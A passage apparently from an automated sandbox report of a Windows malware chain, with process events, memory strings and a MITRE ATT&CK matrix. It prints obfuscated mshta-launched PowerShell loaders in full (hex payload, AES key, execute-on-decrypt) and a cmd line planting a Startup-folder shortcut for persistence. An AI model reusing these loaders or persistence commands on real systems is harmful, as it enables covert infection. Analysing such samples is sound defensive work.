B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BFmcYQ.exe "C:\Users\user\AppData\Roaming\BFmcYQ.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vgarxd){return -split ($vgarxd -replace '..', '0x$& ')};$dlbqcok = clean('00952e0eaaa369cb7eda094fdaad548dc7ebbe105e37d3a4dd5a7d2dc3c7bdb28c06949289913ae18aff4985ac0a4a425f444a5427f4855f02dc192d92c9d059910f5326b551c1fbe3bd556c61d517fd26bb0dda113550d575d28f8a6103693337bf9498ab6f862e4da5e000aa791d9aa38bffdf638aefeb44fa353b1bbc79c0b8f3f039bbfb473dbe5a2163c5297fea3b449744b787bfd5e3d2d2dc793fa3d42573446db8c1522e13a7696f37e5c6dfb4339d6f312da4f7ac3f7f8a272a1c7e6d46c705dc9106adb9d2690ad45f178f68f3f96535f494b1c112a90293671fcf3a99b408b224f36fedb31bc4be9660ab3338dc0571cc95e4819a641f1e63f34eea383da81507a9460d2f793f27c40f0be3cdc495923f94f572d7cc36f0f9bc192b64fff1ea68ff6df1267e85703f7ce3a1b2b369cb69b382fa5e5414694a7fac82db7ef1cd63e7d0db286788c22be423741ce14eed86328e5b0a1b5e6015c081b9adc5584b188904c72fb7809947462abb46b4411c8f7467776c4cf5e6de4a125b51e141f5f377dc69a3a551f363c5b92c853bd07b17d6a6d22b1bb2125b1daa5aeb4779f820fd87d3a473d74f813c3d317edd4ca7364858be4ef1a199cf0cce68623cfcc2dae619884748b0669842add109c7c2d3c94c5e60d3734508294bf013972c272fd970ec7823eef4ec60519b53b7cb23d4b5ab2a35ffda992a39e95a2ea920d0a343160707dd5a2d29ae6ef568d25d354bad060eeb2312efc70e382228038f6e3aafbe6da3f033ec03fcfac2e6474aa92901c29c7e935f0ef9256603e50e9ae54f28c64eb0b62541c16c81b31f123eb1f62aa075030df335f2f233b1d0572db1344253cb16fc57d50ea0fec5f117610698b3981e1fe1037593d2f25954ceb7aa7476166501e6e91201ea06dcea504bf1755984b1eb672a8368994f7fc4c67586ed78251a2f06f39283d3de14a0b398bd25b7578ad0901a36303c6eeae780bd3a96d106c54d28d9174422cfc0c12eed237bb3d9d8b8c0bef9de95a209c8cc66e2b538f79ddaf3183835a0f7f6694a40776335e75bdecd48a839ec0682b59cfa1d33bb11a349ddbb588b3f645cb31e55e0ab2543363e815610eb013deb7ce8ec26a913b7bef508c1825e8c10eb3320c2d1ce31d968f2e47c293cd02c39b499523127d609ccd06dc157d6d2b498a34cf14b0e20bf6bc402b4a171a623af24253354bf256b06b278dbbe05f05b405caa69a5b27d9635119927475c932d7e26f612b9a6119e0da2d95273f043b8bf88a54b8c708e55e08264cba9b31be5df8578c4f53770c16c752ffc20ff1177103b4e88cb671ad1e8922d66ced32f4a427ea0e9009b24ee692a0df6e540dda0214c6ced115113d1de60db67e356e2fa9994fee2c1d1bb4c9efcc878383644915eae6c54ab94c50c12cf86b0105a8ef91d6abc4c61cdfb58006ac5f6d6b39ab88817b83ab53ce4965b39228af37e6a49e5392f23c9553bcf4075260df9b4fe20db589fb4ea5567b6ae3a73fa2fa7c96b3c25c044d663a965cc679968e22349fd362344d3981b8482f16667d5829063a00f894c03fc9cc5753dd640cc66ab7b73d992518cf818b20ce25e63e80de29c8cb1804c28c38743bba0abcee4631fb8ece9886e143ac598e0cff0e0edf7eb943c8a');$fgncqnx = [system.security.cryptography.aes]::create();$fgncqnx.key = clean('764f4d5163617754716d4b6c6e447878');$fgncqnx.iv = new-object byte[] 16;$ckcaaxblz = $fgncqnx.createdecryptor();$lgopfxpip = [text.encoding]::utf8.getstring($ckcaaxblz.transformfinalblock($dlbqcok, 0,$dlbqcok.length)); & $lgopfxpip.substring(0,3) $lgopfxpip.substring(3)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vgarxd){return -split ($vgarxd -replace '..', '0x$& ')};$dlbqcok = clean('00952e0eaaa369cb7eda094fdaad548dc7ebbe105e37d3a4dd5a7d2dc3c7bdb28c06949289913ae18aff4985ac0a4a425f444a5427f4855f02dc192d92c9d059910f5326b551c1fbe3bd556c61d517fd26bb0dda113550d575d28f8a6103693337bf9498ab6f862e4da5e000aa791d9aa38bffdf638aefeb44fa353b1bbc79c0b8f3f039bbfb473dbe5a2163c5297fea3b449744b787bfd5e3d2d2dc793fa3d42573446db8c1522e13a7696f37e5c6dfb4339d6f312da4f7ac3f7f8a272a1c7e6d46c705dc9106adb9d2690ad45f178f68f3f96535f494b1c112a90293671fcf3a99b408b224f36fedb31bc4be9660ab3338dc0571cc95e4819a641f1e63f34eea383da81507a9460d2f793f27c40f0be3cdc495923f94f572d7cc36f0f9bc192b64fff1ea68ff6df1267e85703f7ce3a1b2b369cb69b382fa5e5414694a7fac82db7ef1cd63e7d0db286788c22be423741ce14eed86328e5b0a1b5e6015c081b9adc5584b188904c72fb7809947462abb46b4411c8f7467776c4cf5e6de4a125b51e141f5f377dc69a3a551f363c5b92c853bd07b17d6a6d22b1bb2125b1daa5aeb4779f820fd87d3a473d74f813c3d317edd4ca7364858be4ef1a199cf0cce68623cfcc2dae619884748b0669842add109c7c2d3c94c5e60d3734508294bf013972c272fd970ec7823eef4ec60519b53b7cb23d4b5ab2a35ffda992a39e95a2ea920d0a343160707dd5a2d29ae6ef568d25d354bad060eeb2312efc70e382228038f6e3aafbe6da3f033ec03fcfac2e6474aa92901c29c7e935f0ef9256603e50e9ae54f28c64eb0b62541c16c81b31f123eb1f62aa075030df335f2f233b1d0572db1344253cb16fc57d50ea0fec5f117610698b3981e1fe1037593d2f25954ceb7aa7476166501e6e91201ea06dcea504bf1755984b1eb672a8368994f7fc4c67586ed78251a2f06f39283d3de14a0b398bd25b7578ad0901a36303c6eeae780bd3a96d106c54d28d9174422cfc0c12eed237bb3d9d8b8c0bef9de95a209c8cc66e2b538f79ddaf3183835a0f7f6694a40776335e75bdecd48a839ec0682b59cfa1d33bb11a349ddbb588b3f645cb31e55e0ab2543363e815610eb013deb7ce8ec26a913b7bef508c1825e8c10eb3320c2d1ce31d968f2e47c293cd02c39b499523127d609ccd06dc157d6d2b498a34cf14b0e20bf6bc402b4a171a623af24253354bf256b06b278dbbe05f05b405caa69a5b27d9635119927475c932d7e26f612b9a6119e0da2d95273f043b8bf88a54b8c708e55e08264cba9b31be5df8578c4f53770c16c752ffc20ff1177103b4e88cb671ad1e8922d66ced32f4a427ea0e9009b24ee692a0df6e540dda0214c6ced115113d1de60db67e356e2fa9994fee2c1d1bb4c9efcc878383644915eae6c54ab94c50c12cf86b0105a8ef91d6abc4c61cdfb58006ac5f6d6b39ab88817b83ab53ce4965b39228af37e6a49e5392f23c9553bcf4075260df9b4fe20db589fb4ea5567b6ae3a73fa2fa7c96b3c25c044d663a965cc679968e22349fd362344d3981b8482f16667d5829063a00f894c03fc9cc5753dd640cc66ab7b73d992518cf818b20ce25e63e80de29c8cb1804c28c38743bba0abcee4631fb8ece9886e143ac598e0cff0e0edf7eb943c8a');$fgncqnx = [system.security.cryptography.aes]::create();$fgncqnx.key = clean('764f4d5163617754716d4b6c6e447878');$fgncqnx.iv = new-object byte[] 16;$ckcaaxblz = $fgncqnx.createdecryptor();$lgopfxpip = [text.encoding]::utf8.getstring($ckcaaxblz.transformfinalblock($dlbqcok, 0,$dlbqcok.length)); & $lgopfxpip.substring(0,3) $lgopfxpip.substring(3)Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_00007FF74D09C5FC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00007FF74D09D540
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AF23000.00000004.00000800.00020000.00000000.sdmp, BFmcYQ.exe, 0000000E.00000000.1574664212.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BFmcYQ.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06FD20 cpuid 14_2_00007FF74D06FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D092BA0 GetLocalTime,14_2_00007FF74D092BA0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D092BCF GetUserNameW,14_2_00007FF74D092BCF
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_00007FF74D072650
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D051D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,14_2_00007FF74D051D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000015.00000002.2643432226.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000013.00000002.2027661393.0000026D36328000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3652D000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1753080999.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1753191048.0000000004401000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1744211015.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1749943273.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1739343143.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1748892139.0000000004401000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1730675513.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1749314000.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1730390057.0000000004500000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: BFmcYQ.exe, 0000000E.00000002.1668946917.0000019AF6E48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2027661393.0000026D362B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3652D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1774716962.0000026D1C209000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000015.00000002.2642630373.00000000009BF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.0000000003902000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2642630373.00000000009CF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: BFmcYQ.exe.7.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif.21.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_00007FF74D0C4074
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,14_2_00007FF74D0C3940
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,21_2_00A9696E
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,21_2_00A96E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F8696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,27_2_00F8696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F86E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_00F86E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		2
Native API		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares21
Input Capture		2
